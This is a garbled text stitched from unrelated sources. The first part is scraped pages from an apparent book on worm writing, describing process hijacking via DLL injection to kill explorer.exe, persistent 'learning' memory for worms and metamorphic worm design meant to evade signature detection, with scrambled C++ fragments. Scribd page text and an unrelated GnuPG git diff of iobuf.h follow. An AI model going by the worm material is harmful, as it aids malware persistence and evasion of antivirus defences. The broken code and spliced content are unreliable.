328 . 0). Copy the DLL sync.exe is WaitForSingleObject. it waits for the objects to signal their termination until timeout occurs.exe and then terminate the test1. (LPTHREAD_START_ROUTINE) injectionVector. all opened folders will get closed. which have GUI.dll from from its project’s debug folder and put it into the folder containing the test1. &Pe)). The desktop will suddenly vanish but soon will come back. 0).exe file and execute the test1. LPVOID lpReserved { WaitForSingleObject(procHunter("test1. } return NULL.exe anyhow. CloseHandle(hSnap). } BOOL APIENTRY DllMain( HANDLE hModule. Another function WaitForMultipleObjects is available for waiting for multiple object signals simultaneously.Sleep(5). DWORD ) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) HANDLE invThread = CreateThread(NULL. } while (Process32Next(hSnap. } ul_reason_for_call. 60000). remember that console applications are always considered idle for this function and it only supports those functions. } void WINAPI injectionVector() TerminateProcess(GetCurrentProcess(). Another very helpful function WaitForInputIdle is provided by windows API to wait until target process becomes idle. NULL. 0.exe"). return true. 0.exe for test1. As name itself explains. The function that performs the signal scanning from explorer.
The process hijacking is a powerful technique as it is demonstrated into the above example. 329 . It provides better ways to avoid the full termination of worm processes by spawning into several different processes.
But Artificial life is the technology that has provided the Holy grail of producing the living things and these things can think. The following figure explains the tiers concept of the memory cache.The Learning Code The human beings can create life only by one way and that is by giving birth to a child. The memory database should be implemented in several different layers and tiers to facilitate smaller size and better mutability and movability. The protocols like OSPF (open shortest path first). reproduce themselves and can learn by experience. BGP (border gateway protocol) and most of routing protocols are built on such a technology that the different nodes can talk and learn from each other and provide faster and reliable networks across the world. this memory should be persistent to provide full feedback even after the machine is restarted again. In same way the local network segment’s shared cache can be further filtered and sent to the upper tier or layer lying in a bigger network segment. Further this larger network segment can send its records to a memory cache underlying several such regional memory caches under one roof.e. The database should implement filters to get rid of useless and redundant records. In case of machines. The living things are also gifted with a bounty i. the memory. 330 . A single node should limit its local memory limit and send its experience (the records) to the upper tier or upper layer memory node elected by the several different nodes inside the same network segment or subnet. make decisions. But how to built a truly talking and learning technology? The answer can be derive by studying the working of a set of networking protocols. This will enhance the learning process to a great extent. The learning process can be enhanced if these living things can talk to each other just like human conversations. No other way is there to produce any living thing. mutually for sharing their experience. We can implement such persistent memory by a small database. The memory is necessary to keep the learned things for later use.
Nodal Layer: This layer represents the information storing resources locally available. Upper Layer: This layer is placed above all layers. Whereas. Subnet Layer: This layer represents the shared resource available to all nodes present into a single network. we should limit the number of tiers not to exceed 1 or 2 tiers or layers. The figure represents a global solution for sharing information in a web of nodes around the world. But as the number of tiers increases the need of a dedicated cache hardware is needed and it deteriorates the fully automation of memory cache implementations. Node can directly process only the information available into this tier or layer. but storing and retrieving information from this tier is a 331 . Every single node can find certain information and thus the experience. the middle or subnet layer can be sent the exclusive and non redundant information to be cached for sharing it with other nodes. then after refinement this information can be stored into the nodal layer or better say the memory cache resource locally available to the node. Note: Here memory means storage of any kind possessed by the objects and not the RAM or ROM. The exclusive information can be stored here for sharing it among several other nodes.The memory Layers The nodal layer represents the individual objects and these objects have a limit on their memory size. To avoid such hindrance in memory automation.
332 . A protocol is needed for memory quanta (the information) transactions among different tiers. This protocol should perform the data redundancy checks and should group and sort the information according to its type and make all these memory quanta equally available to all nodes and sub layers or tiers. The upper tier or main cache should be implemented where number of nodes is limited so as not to jam the networks and machines and other resources.cumbersome task because it needs an extra overhead to make the information available to lower layers and even the larger in size. faster and multithreaded storing resource is needed than the resources available in lower tiers.
several different high level instructions produce same low level code. which produce same thing but follow different instructions. The metamorphic worms differ in their execution unlike the polymorphic worms. Note: These algorithms must produce different low level machine code. we can interchange the instructions which produce similar results. B2. E. we can arrange them in execution steps table as: 333 . C. for C we develop 4 algorithms named C1. Means the execution of code changes with every offspring of the worm. E5. We can name them A1. Suppose that we have to produce a worm that executes with 5 different steps. Because. The simplest method is to develop several different and unique algorithms producing same results. The algorithm chosing can again be done in atleast two different ways. which encrypt their code to change their physical shape. The metamorphic code can be developed in several ways. worm can set its own execution path on its own on-the-fly. for most of these steps the worm should have some choices of algorithm. In one way. C2. The code can be rearranged or shuffled to acquire another execution path to get rid of execution signature matching. Now. Worm can then randomly chose the algorithm. A3. we can set the execution path of the worm in its physical file by doing necessary alterations during cloning process and in another technique. We name these steps A. A2.g. D. C4 and for D only one and E has 5 different algorithms E1. C3. E2.MetaMorphism Metamorphism is a technique to reproduce the artificial life with different DNA. we developed 3 different algorithms for step A. E3. B. Let us take a scenario for this discussion. Ok suppose. E. Metamorphism is a technique that can help us in the development of interplatform worm. Similarly for B we develop 2 named B1. in order to exhibit some degree of metamorphism. E4.
return leopard. leopard = leopard ^ GetCurrentThreadId(). C3. E2. The worm can randomly chose anyone of these 120 execution paths. E4. we have 3 x 2 x 4 x 1 x 5 = 120 different execution paths for our worm. E3. we have defined 10 functions and the program executes them randomly.h> using namespace std. In next example code. C2. C4 D1 E1.dwLowDateTime. every time selecting randomly anyone out of 10 choices for 10 times. A2. LARGE_INTEGER perfcount. unsigned int randNS() FILETIME ft. tmp = *(ptr + 1) ^ *ptr. unsigned int leopard = 0. unsigned int *ptr = 0. GetSystemTimeAsFileTime (&ft).cpp */ #include <iostream> #include <windows. Therefore. leopard = ft. A3 B1. leopard = leopard ^ *ptr. } { 334 . B2 C1. QueryPerformanceCounter (&perfcount). E5 Now. ptr = (unsigned int *) &perfcount. leopard = leopard ^ GetTickCount(). leopard = leopard ^ GetCurrentProcessId(). unsigned int tmp = 0. Let us develop a coded example.1 2 3 4 5 A B C D E A1.dwHighDateTime ^ ft. /* complex1. worm has to choose only one out of these choices in every step and it will have several different execution paths.
{ { GetModuleHandle("complex1.exe").\n"). } _declspec (dllexport) void func3() } _declspec (dllexport) void func4() printf("[4]: Tusaan sunhaa?\n").\n"). { { printf("[5]: Gahre aahle kutaanh hainn ggeyo?\n").\n")._declspec (dllexport) void func1() printf("[1]: Jaijeya!\n"). void (__cdecl *test) (void). char buffer[10]. strcpy(buffer. } _declspec (dllexport) void func7() printf("[7]: sab raazi-baazi hainn na?\n"). } _declspec (dllexport) void func8() printf("[8]: sunhaa kuchh noaa taaza. 335 .\n"). HMODULE hcomplex = { { { printf("[3]: Assaan taan raazi-khushi hainn. "func"). } _declspec (dllexport) void func9() } _declspec (dllexport) void func10() printf("[10]: amma-bappu kuthu hainn?\n"). } _declspec (dllexport) void func5() } _declspec (dllexport) void func6() printf("[6]: ajj mausam kharaa hai. char* argv[]) int random = 0. { { { { printf("[9]: Tusaan bade khare mahnhu hainn. } int main (int argc. } _declspec (dllexport) void func2() printf("[2]: Theek-thaak hainn na?\n").
memset(buffer. } } return EXIT_SUCCESS. } { Now add a . 0. EXECUTABLE DESCRIPTION EXPORTS func1 func2 func3 func4 func5 func6 func7 func8 func9 func10 "complex1" 'test program' 336 . sizeof(buffer)). ++random. "func%d". if (test != NULL) test(). for (int iter = 0. } Sleep(300).def file to the project complex1 containing following lines(Select Project->Add To Project->Files): .def : Defines exportable functions of complex1.if (hcomplex != NULL) printf("recieved handle\n"). sprintf(buffer. complex1. { { test = (void (__cdecl *) (void))GetProcAddress(hcomplex. iter++) random = randNS()%10. random). buffer). iter < 10.
now let use develop the above listed scenario in On-the-Fly way: 337 .The above code was enough warm up.
This action might not be possible to undo. Are you sure you want to continue?
We've moved you to where you read on your other device.
Get the full title to continue listening from where you left off, or restart the preview. | https://www.scribd.com/doc/51926549/%ED%8C%8C%EC%9B%8C%ED%95%B4%ED%82%B9%EC%B1%85 | CC-MAIN-2016-36 | refinedweb | 67,515 | 68.16 |
projects
/
gnupg.git
/ blobdiff
commit
grep
author
committer
pickaxe
?
search:
re
summary
|
shortlog
|
log
|
commit
|
commitdiff
|
tree
raw
| inline |
side by side
gpg: Disable compliance module for other GnuPG components.
[gnupg.git]
/
common
/
iobuf.h
diff --git
a/common/iobuf.h
b/common/iobuf.h
index
3a189c4
..
22e02da
100644
(file)
--- a/
common/iobuf.h
+++ b/
common/iobuf.h
@@
-2,39
+2,112
@@
* 2010 Free Software Foundation, Inc.
*
- * This file is part of G
NU
PG.
+ * This file is part of G
nu
PG.
*
- * GNUPG is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation; either version 3 of the License, or
- * (at your option) any later version.
+ * This file is free software; you can redistribute it and/or modify
+ * it under the terms of either
*
- * GNUPG is distributed in the hope that it will be useful,
+ * - <>.
+ * along with this program; if not, see <http
s
://>.
*/
#ifndef GNUPG_COMMON_IOBUF_H
#define GNUPG_COMMON_IOBUF_H
-#include "../include/types.h" /* fixme: should be moved elsewhere. */
+/* An iobuf is basically a filter in a pipeline.
+
+ Consider the following command, which consists of three filters
+ that are chained together:
+
+ $ cat file | base64 --decode | gunzip
+
+ The first filter reads the file from the file system and sends that
+ data to the second filter. The second filter decodes
+ base64-encoded data and sends the data to the third and last
+ filter. The last filter decompresses the data and the result is
+ displayed on the terminal. The iobuf system works in the same way
+ where each iobuf is a filter and the individual iobufs can be
+ chained together.
+
+ There are number of predefined filters. iobuf_open(), for
+ instance, creates a filter that reads from a specified file. And,
+ iobuf_temp_with_content() creates a filter that returns some
+ specified contents. There are also filters for writing content.
+ iobuf_openrw opens a file for writing. iobuf_temp creates a filter
+ that writes data to a fixed-sized buffer.
+
+ To chain filters together, you use the iobuf_push_filter()
+ function. The filters are chained together using the chain field
+ in the iobuf_t.
+
+ A pipeline can only be used for reading (IOBUF_INPUT) or for
+ writing (IOBUF_OUTPUT / IOBUF_OUTPUT_TEMP). When reading, data
+ flows from the last filter towards the first. That is, the user
+ calls iobuf_read(), the module reads from the first filter, which
+ gets its input from the second filter, etc. When writing, data
+ flows from the first filter towards the last. In this case, when
+ the user calls iobuf_write(), the data is written to the first
+ filter, which writes the transformed data to the second filter,
+ etc.
+
+ An iobuf_t contains some state about the filter. For instance, it
+ indicates if the filter has already returned EOF (filter_eof) and
+ the next filter in the pipeline, if any (chain). It also contains
+ a function pointer, filter. This is a generic function. It is
+ called when input is needed or output is available. In this case
+ it is passed a pointer to some filter-specific persistent state
+ (filter_ov), the actual operation, the next filter in the chain, if
+ any, and a buffer that either contains the contents to write, if
+ the pipeline is setup to write data, or is the place to store data,
+ if the pipeline is setup to read data.
+
+
+ Unlike a Unix pipeline, an IOBUF pipeline can return EOF multiple
+ times. This is similar to the following:
+
+ { cat file1; cat file2; } | grep foo
+
+ However, instead of grep seeing a single stream, grep would see
+ each byte stream followed by an EOF marker. (When a filter returns
+ EOF, the EOF is returned to the user exactly once and then the
+ filter is removed from the pipeline.) */
+
+/* For estream_t. */
+#include <gpg-error.h>
+
+#include "../common/types.h"
#include "../common/sysutils.h"
-#include "../common/estream.h"
#define DBG_IOBUF iobuf_debug_mode
/* Filter control modes. */
-#define IOBUFCTRL_INIT 1
-#define IOBUFCTRL_FREE 2
-#define IOBUFCTRL_UNDERFLOW 3
-#define IOBUFCTRL_FLUSH 4
-#define IOBUFCTRL_DESC 5
-#define IOBUFCTRL_CANCEL 6
-#define IOBUFCTRL_USER 16
+enum
+ {
+ IOBUFCTRL_INIT = 1,
+ IOBUFCTRL_FREE = 2,
+ IOBUFCTRL_UNDERFLOW = 3,
+ IOBUFCTRL_FLUSH = 4,
+ IOBUFCTRL_DESC = 5,
+ IOBUFCTRL_CANCEL = 6,
+ IOBUFCTRL_USER = 16
+ };
/* Command codes for iobuf_ioctl. */
@@
-46,6
+119,25
@@
typedef enum
IOBUF_IOCTL_FSYNC = 4 /* Uses ptrval. */
} iobuf_ioctl_t;
+enum iobuf_use
+ {
+ /* Pipeline is in input mode. The data flows from the end to the
+ beginning. That is, when reading from the pipeline, the first
+ filter gets its input from the second filter, etc. */
+ IOBUF_INPUT,
+ /* Pipeline is in input mode. The last filter in the pipeline is
+ a temporary buffer from which the data is "read". */
+ IOBUF_INPUT_TEMP,
+ /* Pipeline is in output mode. The data flows from the beginning
+ to the end. That is, when writing to the pipeline, the user
+ writes to the first filter, which transforms the data and sends
+ it to the second filter, etc. */
+ IOBUF_OUTPUT,
+ /* Pipeline is in output mode. The last filter in the pipeline is
+ a temporary buffer that grows as necessary. */
+ IOBUF_OUTPUT_TEMP
+ };
+
typedef struct iobuf_struct *iobuf_t;
typedef struct iobuf_struct *IOBUF; /* Compatibility with gpg 1.4. */
@@
-53,35
+145,108
@@
typedef struct iobuf_struct *IOBUF; /* Compatibility with gpg 1.4. */
/* fixme: we should hide most of this stuff */
struct iobuf_struct
{
- int use; /* 1 input , 2 output, 3 temp */
+ /* The type of filter. Either IOBUF_INPUT, IOBUF_OUTPUT or
+ IOBUF_OUTPUT_TEMP. */
+ enum iobuf_use use;
+
+ /* nlimit can be changed using iobuf_set_limit. If non-zero, it is
+ the number of additional bytes that can be read from the filter
+ before EOF is forcefully returned. */
off_t nlimit;
- off_t nbytes; /* Used together with nlimit. */
- off_t ntotal; /* Total bytes read (position of stream). */
- int nofast; /* Used by the iobuf_get (). */
- void *directfp;
+ /* nbytes if the number of bytes that have been read (using
+ iobuf_get / iobuf_readbyte / iobuf_read) since the last call to
+ iobuf_set_limit. */
+ off_t nbytes;
+
+ /* The number of bytes read prior to the last call to
+ iobuf_set_limit. Thus, the total bytes read (i.e., the position
+ of stream) is ntotal + nbytes. */
+ off_t ntotal;
+
+ /* Whether we need to read from the filter one byte at a time or
+ whether we can do bulk reads. We need to read one byte at a time
+ if a limit (set via iobuf_set_limit) is active. */
+ int nofast;
+
+ /* A buffer for unread/unwritten data.
+
+ For an output pipeline (IOBUF_OUTPUT), this is the data that has
+ not yet been written to the filter. Consider a simple pipeline
+ consisting of a single stage, which writes to a file. When you
+ write to the pipeline (iobuf_writebyte or iobuf_write), the data
+ is first stored in this buffer. Only when the buffer is full or
+ you call iobuf_flush() is FILTER actually called and the data
+ written to the file.
+
+ For an input pipeline (IOBUF_INPUT), this is the data that has
+ been read from this filter, but not yet been read from the
+ preceding filter (or the user, if this filter is the head of the
+ pipeline). Again, consider a simple pipeline consisting of a
+ single stage. This stage reads from a file. If you read a
+ single byte (iobuf_get) and the buffer is empty, then FILTER is
+ called to fill the buffer. In this case, a single byte is not
+ requested, but the whole buffer is filled (if possible). */
struct
{
- size_t size; /* Allocated size */
- size_t start; /* Number of invalid bytes at the
- begin of the buffer */
- size_t len; /* Currently filled to this size */
+ /* Size of the buffer. */
+ size_t size;
+ /* Number of bytes at the beginning of the buffer that have
+ already been consumed. (In other words: the index of the first
+ byte that hasn't been consumed.) This is only non-zero for
+ input filters. */
+ size_t start;
+ /* The number of bytes in the buffer including any bytes that have
+ been consumed. */
+ size_t len;
+ /* The buffer itself. */
byte *buf;
} d;
+ /* When FILTER is called to read some data, it may read some data
+ and then return EOF. We can't return the EOF immediately.
+ Instead, we note that we observed the EOF and when the buffer is
+ finally empty, we return the EOF. */
int filter_eof;
+ /* Like filter_eof, when FILTER is called to read some data, it may
+ read some data and then return an error. We can't return the
+ error (in the form of an EOF) immediately. Instead, we note that
+ we observed the error and when the buffer is finally empty, we
+ return the EOF. */
int error;
+
+ /* The callback function to read data from the filter, etc. See
+ iobuf_filter_push for details. */
int (*filter) (void *opaque, int control,
iobuf_t chain, byte * buf, size_t * len);
- void *filter_ov; /* Value for opaque */
+ /* An opaque pointer that can be used for local filter state. This
+ is passed as the first parameter to FILTER. */
+ void *filter_ov;
+ /* Whether the iobuf code should free(filter_ov) when destroying the
+ filter. */
int filter_ov_owner;
+
+ /* When using iobuf_open, iobuf_create, iobuf_openrw to open a file,
+ the file's name is saved here. This is used to delete the file
+ when an output pipeline (IOBUF_OUPUT) is canceled
+ (iobuf_cancel). */
char *real_fname;
- iobuf_t chain; /* Next iobuf used for i/o if any
- (passed to filter) */
- int no, subno;
- const char *desc;
- void *opaque; /* Can be used to hold any information
- this value is copied to all
- instances */
+
+ /* The next filter in the pipeline. */
+ iobuf_t chain;
+
+ /* This field is for debugging. Each time a filter is allocated
+ (via iobuf_alloc()), a monotonically increasing counter is
+ incremented and this field is set to the new value. This field
+ should only be accessed via the iobuf_io macro. */
+ int no;
+
+ /* The number of filters in the pipeline following (not including)
+ this one. When you call iobuf_push_filter or iobuf_push_filter2,
+ this value is used to check the length of the pipeline if the
+ pipeline already contains 65 stages then these functions fail.
+ This amount of nesting typically indicates corrupted data or an
+ active denial of service attack. */
+ int subno;
};
#ifndef EXTERN_UNLESS_MAIN_MODULE
@@
-93,88
+258,365
@@
struct iobuf_struct
#endif
EXTERN_UNLESS_MAIN_MODULE int iobuf_debug_mode;
-void iobuf_enable_special_filenames (int yes);
+
+/* Returns whether the specified filename corresponds to a pipe. In
+ particular, this function checks if FNAME is "-" and, if special
+ filenames are enabled (see check_special_filename), whether
+ FNAME is a special filename. */
int iobuf_is_pipe_filename (const char *fname);
+
+/* Allocate a new filter. This filter doesn't have a function
+ assigned to it. Thus you need to manually set IOBUF->FILTER and
+ IOBUF->FILTER_OV, if required. This function is intended to help
+ create a new primary source or primary sink, i.e., the last filter
+ in the pipeline.
+
+ USE is IOBUF_INPUT, IOBUF_INPUT_TEMP, IOBUF_OUTPUT or
+ IOBUF_OUTPUT_TEMP.
+
+ BUFSIZE is the desired internal buffer size (that is, the size of
+ the typical read / write request). */
iobuf_t iobuf_alloc (int use, size_t bufsize);
+
+/* Create an output filter that simply buffers data written to it.
+ This is useful for collecting data for later processing. The
+ buffer can be written to in the usual way (iobuf_write, etc.). The
+ data can later be extracted using iobuf_write_temp() or
+ iobuf_temp_to_buffer(). */
iobuf_t iobuf_temp (void);
+
+/* Create an input filter that contains some data for reading. */
iobuf_t iobuf_temp_with_content (const char *buffer, size_t length);
-iobuf_t iobuf_open_fd_or_name (gnupg_fd_t fd, const char *fname,
- const char *mode);
+
+/* Create an input file filter that reads from a file. If FNAME is
+ '-', reads from stdin. If special filenames are enabled
+ (iobuf_enable_special_filenames), then interprets special
+ filenames. */
iobuf_t iobuf_open (const char *fname);
+
+/* Create an output file filter that writes to a file. If FNAME is
+ NULL or '-', writes to stdout. If special filenames are enabled
+ (iobuf_enable_special_filenames), then interprets special
+ filenames. If FNAME is not NULL, '-' or a special filename, the
+ file is opened for writing. If the file exists, it is truncated.
+ If MODE700 is TRUE, the file is created with mode 600. Otherwise,
+ mode 666 is used. */
+iobuf_t iobuf_create (const char *fname, int mode700);
+
+/* Create an output file filter that writes to a specified file.
+ Neither '-' nor special file names are recognized. */
+iobuf_t iobuf_openrw (const char *fname);
+
+/* Create a file filter using an existing file descriptor. If MODE
+ contains the letter 'w', creates an output filter. Otherwise,
+ creates an input filter. Note: MODE must reflect the file
+ descriptors actual mode! When the filter is destroyed, the file
+ descriptor is closed. */
iobuf_t iobuf_fdopen (int fd, const char *mode);
+
+/* Like iobuf_fdopen, but doesn't close the file descriptor when the
+ filter is destroyed. */
iobuf_t iobuf_fdopen_nc (int fd, const char *mode);
+
+/* Create a filter using an existing estream. If MODE contains the
+ letter 'w', creates an output filter. Otherwise, creates an input
+ filter. If KEEP_OPEN is TRUE, then the stream is not closed when
+ the filter is destroyed. Otherwise, the stream is closed when the
+ filter is destroyed. */
iobuf_t iobuf_esopen (estream_t estream, const char *mode, int keep_open);
+
+/* Create a filter using an existing socket. On Windows creates a
+ special socket filter. On non-Windows systems simply, this simply
+ calls iobuf_fdopen. */
iobuf_t iobuf_sockopen (int fd, const char *mode);
-iobuf_t iobuf_create (const char *fname);
-iobuf_t iobuf_append (const char *fname);
-iobuf_t iobuf_openrw (const char *fname);
+
+/* Set various options / perform different actions on a PIPELINE. See
+ the IOBUF_IOCTL_* macros above. */
int iobuf_ioctl (iobuf_t a, iobuf_ioctl_t cmd, int intval, void *ptrval);
+
+/* Close a pipeline. The filters in the pipeline are first flushed
+ using iobuf_flush, if they are output filters, and then
+ IOBUFCTRL_FREE is called on each filter.
+
+ If any filter returns a non-zero value in response to the
+ IOBUFCTRL_FREE, that first such non-zero value is returned. Note:
+ processing is not aborted in this case. If all filters are freed
+ successfully, 0 is returned. */
int iobuf_close (iobuf_t iobuf);
+
+/* Calls IOBUFCTRL_CANCEL on each filter in the pipeline. Then calls
+ io_close() on the pipeline. Finally, if the pipeline is an output
+ pipeline, deletes the file. Returns the result of calling
+ iobuf_close on the pipeline. */
int iobuf_cancel (iobuf_t iobuf);
+/* Add a new filter to the front of a pipeline. A is the head of the
+ pipeline. F is the filter implementation. OV is an opaque pointer
+ that is passed to F and is normally used to hold any internal
+ state, such as a file pointer.
+
+ Note: you may only maintain a reference to an iobuf_t as a
+ reference to the head of the pipeline. That is, don't think about
+ setting a pointer in OV to point to the filter's iobuf_t. This is
+ because when we add a new filter to a pipeline, we memcpy the state
+ in A into new buffer. This has the advantage that there is no need
+ to update any references to the pipeline when a filter is added or
+ removed, but it also means that a filter's state moves around in
+ memory.
+
+ The behavior of the filter function is determined by the value of
+ the control parameter:
+
+ IOBUFCTRL_INIT: Called this value just before the filter is
+ linked into the pipeline. This can be used to initialize
+ internal data structures.
+
+ IOBUFCTRL_FREE: Called with this value just before the filter is
+ removed from the pipeline. Normally used to release internal
+ data structures, close a file handle, etc.
+
+ IOBUFCTRL_UNDERFLOW: Called with this value to fill the passed
+ buffer with more data. *LEN is the size of the buffer. Before
+ returning, it should be set to the number of bytes which were
+ written into the buffer. The function must return 0 to
+ indicate success, -1 on EOF and a GPG_ERR_xxxxx code for any
+ error.
+
+ Note: this function may both return data and indicate an error
+ or EOF. In this case, it simply writes the data to BUF, sets
+ *LEN and returns the appropriate return code. The implication
+ is that if an error occurs and no data has yet been written, it
+ is essential that *LEN be set to 0!
+
+ IOBUFCTRL_FLUSH: Called with this value to write out any
+ collected data. *LEN is the number of bytes in BUF that need
+ to be written out. Returns 0 on success and a GPG_ERR_* code
+ otherwise. *LEN must be set to the number of bytes that were
+ written out.
+
+ IOBUFCTRL_CANCEL: Called with this value when iobuf_cancel() is
+ called on the pipeline.
+
+ IOBUFCTRL_DESC: Called with this value to get a human-readable
+ description of the filter. *LEN is the size of the buffer.
+ The description is filled into BUF, NUL-terminated. Always
+ returns 0.
+ */
int iobuf_push_filter (iobuf_t a, int (*f) (void *opaque, int control,
- iobuf_t chain, byte * buf,
- size_t * len), void *ov);
+ iobuf_t chain, byte * buf,
+ size_t * len), void *ov);
+/* This variant of iobuf_push_filter allows the called to indicate
+ that OV should be freed when this filter is freed. That is, if
+ REL_OV is TRUE, then when the filter is popped or freed OV will be
+ freed after the filter function is called with control set to
+ IOBUFCTRL_FREE. */
int iobuf_push_filter2 (iobuf_t a,
int (*f) (void *opaque, int control, iobuf_t chain,
byte * buf, size_t * len), void *ov,
int rel_ov);
-int iobuf_flush (iobuf_t a);
-void iobuf_clear_eof (iobuf_t a);
+
+/* Pop the top filter. The top filter must have the filter function F
+ and the cookie OV. The cookie check is ignored if OV is NULL. */
+int iobuf_pop_filter (iobuf_t a,
+ int (*f) (void *opaque, int control,
+ iobuf_t chain, byte * buf, size_t * len),
+ void *ov);
+
+/* Used for debugging. Prints out the chain using log_debug if
+ IOBUF_DEBUG_MODE is not 0. */
+int iobuf_print_chain (iobuf_t a);
+
+/* Indicate that some error occurred on the specified filter. */
#define iobuf_set_error(a) do { (a)->error = 1; } while(0)
+
+/* Return any pending error on filter A. */
#define iobuf_error(a) ((a)->error)
+/* Limit the amount of additional data that may be read from the
+ filter. That is, if you've already read 100 bytes from A and you
+ set the limit to 50, then you can read up to an additional 50 bytes
+ (i.e., a total of 150 bytes) before EOF is forcefully returned.
+ Setting NLIMIT to 0 removes any active limit.
+
+ Note: using iobuf_seek removes any currently enforced limit! */
void iobuf_set_limit (iobuf_t a, off_t nlimit);
+/* Returns the number of bytes that have been read from the pipeline.
+ Note: the result is undefined for IOBUF_OUTPUT and IOBUF_OUTPUT_TEMP
+ pipelines! */
off_t iobuf_tell (iobuf_t a);
+
+/* There are two cases:
+
+ - If A is an INPUT or OUTPUT pipeline, then the last filter in the
+ pipeline is found. If that is not a file filter, -1 is returned.
+ Otherwise, an fseek(..., SEEK_SET) is performed on the file
+ descriptor.
+
+ - If A is a TEMP pipeline and the *first* (and thus only filter) is
+ a TEMP filter, then the "file position" is effectively unchanged.
+ That is, data is appended to the buffer and the seek does not
+ cause the size of the buffer to grow.
+
+ If no error occurred, then any limit previous set by
+ iobuf_set_limit() is cleared. Further, any error on the filter
+ (the file filter or the temp filter) is cleared.
+
+ Returns 0 on success and -1 if an error occurs. */
int iobuf_seek (iobuf_t a, off_t newpos);
+/* Read a single byte. If a filter has no more data, returns -1 to
+ indicate the EOF. Generally, you don't want to use this function,
+ but instead prefer the iobuf_get macro, which is faster if there is
+ data in the internal buffer. */
int iobuf_readbyte (iobuf_t a);
+
+/*)
+
+/* Fill BUF with up to BUFLEN bytes. If a filter has no more data,
+ returns -1 to indicate the EOF. Otherwise returns the number of
+ bytes read. */
int iobuf_read (iobuf_t a, void *buf, unsigned buflen);
-void iobuf_unread (iobuf_t a, const unsigned char *buf, unsigned int buflen);
+
+/* Read a line of input (including the '\n') from the pipeline.
+
+ The semantics are the same as for fgets(), but if the buffer is too
+ short a larger one will be allocated up to *MAX_LENGTH and the end
+ of the line except the trailing '\n' discarded. (Thus,
+ *ADDR_OF_BUFFER must be allocated using malloc().) If the buffer
+ is enlarged, then *LENGTH_OF_BUFFER will be updated to reflect the
+ new size. If the line is truncated, then *MAX_LENGTH will be set
+ to 0. If *ADDR_OF_BUFFER is NULL, a buffer is allocated using
+ malloc().
+
+ A line is considered a byte stream ending in a '\n'. Returns the
+ number of characters written to the buffer (i.e., excluding any
+ discarded characters due to truncation). Thus, use this instead of
+ strlen(buffer) to determine the length of the string as this is
+ unreliable if the input contains NUL characters.
+
+ EOF is indicated by a line of length zero.
+
+ The last LF may be missing due to an EOF. */
unsigned iobuf_read_line (iobuf_t a, byte ** addr_of_buffer,
unsigned *length_of_buffer, unsigned *max_length);
+
+/* Read up to BUFLEN bytes from pipeline A. Note: this function can't
+ return more than the pipeline's internal buffer size. The return
+ value is the number of bytes actually written to BUF. If the
+ filter returns EOF, then this function returns -1.
+
+ This function does not clear any pending EOF. That is, if the
+ pipeline consists of two filters and the first one returns EOF
+ during the peek, then the subsequent iobuf_read* will still return
+ EOF before returning the data from the second filter. */
int iobuf_peek (iobuf_t a, byte * buf, unsigned buflen);
+
+/* Write a byte to the pipeline. Returns 0 on success and an error
+ code otherwise. */
int iobuf_writebyte (iobuf_t a, unsigned c);
+
+/* Alias for iobuf_writebyte. */
+#define iobuf_put(a,c) iobuf_writebyte(a,c)
+
+/* Write a sequence of bytes to the pipeline. Returns 0 on success
+ and an error code otherwise. */
int iobuf_write (iobuf_t a, const void *buf, unsigned buflen);
+
+/* Write a string (not including the NUL terminator) to the pipeline.
+ Returns 0 on success and an error code otherwise. */
int iobuf_writestr (iobuf_t a, const char *buf);
+/* Flushes the pipeline removing all filters but the sink (the last
+ filter) in the process. */
void iobuf_flush_temp (iobuf_t temp);
-int iobuf_write_temp (iobuf_t a, iobuf_t temp);
+
+/* Flushes the pipeline SOURCE removing all filters but the sink (the
+ last filter) in the process (i.e., it calls
+ iobuf_flush_temp(source)) and then writes the data to the pipeline
+ DEST. Note: this doesn't free (iobuf_close()) SOURCE. Both SOURCE
+ and DEST must be output pipelines. */
+int iobuf_write_temp (iobuf_t dest, iobuf_t source);
+
+/* Flushes each filter in the pipeline (i.e., sends any buffered data
+ to the filter by calling IOBUFCTRL_FLUSH). Then, copies up to the
+ first BUFLEN bytes from the last filter's internal buffer (which
+ will only be non-empty if it is a temp filter) to the buffer
+ BUFFER. Returns the number of bytes actually copied. */
size_t iobuf_temp_to_buffer (iobuf_t a, byte * buffer, size_t buflen);
+/* Copies the data from the input iobuf SOURCE to the output iobuf
+ DEST until either an error is encountered or EOF is reached.
+ Returns the number of bytes successfully written. If an error
+ occurred, then any buffered bytes are not returned to SOURCE and are
+ effectively lost. To check if an error occurred, use
+ iobuf_error. */
+size_t iobuf_copy (iobuf_t dest, iobuf_t source);
+
+/* Return the size of any underlying file. This only works with
+ file_filter based pipelines.
+
+ On Win32, it is sometimes not possible to determine the size of
+ files larger than 4GB. In this case, *OVERFLOW (if not NULL) is
+ set to 1. Otherwise, *OVERFLOW is set to 0. */
off_t iobuf_get_filelength (iobuf_t a, int *overflow);
#define IOBUF_FILELENGTH_LIMIT 0xffffffff
+
+/* Return the file descriptor designating the underlying file. This
+ only works with file_filter based pipelines. */
int iobuf_get_fd (iobuf_t a);
+
+/* Return the real filename, if available. This only supports
+ pipelines that end in file filters. Returns NULL if not
+ available. */
const char *iobuf_get_real_fname (iobuf_t a);
+
+/* Return the filename or a description thereof. For instance, for
+ iobuf_open("-"), this will return "[stdin]". This only supports
+ pipelines that end in file filters. Returns NULL if not
+ available. */
const char *iobuf_get_fname (iobuf_t a);
-const char *iobuf_get_fname_nonnull (iobuf_t a);
-void iobuf_set_partial_block_mode (iobuf_t a, size_t len);
+/* Like iobuf_getfname, but instead of returning NULL if no
+ description is available, return "[?]". */
+const char *iobuf_get_fname_nonnull (iobuf_t a);
-void iobuf_skip_rest (iobuf_t a, unsigned long n, int partial);
+/* Pushes a filter on the pipeline that interprets the datastream as
+ an OpenPGP data block whose length is encoded using partial body
+ length headers (see Section 4.2.2.4 of RFC 4880). Concretely, it
+ just returns / writes the data and finishes the packet with an
+ EOF. */
+void iobuf_set_partial_body_length_mode (iobuf_t a, size_t len);
+/* If PARTIAL is set, then read from the pipeline until the first EOF
+ is returned.
-/*)
+ If PARTIAL is 0, then read up to N bytes or until the first EOF is
+ returned.
-/* write a byte to the iobuf and return true on write error
- * This macro does only write the low order byte
- */
-#define iobuf_put(a,c) iobuf_writebyte(a,c)
+ Recall: a filter can return EOF. In this case, it and all
+ preceding filters are popped from the pipeline and the next read is
+
from the following filter (which may or may not return EOF).
*/
+void iobuf_skip_rest (iobuf_t a, unsigned long n, int partial);
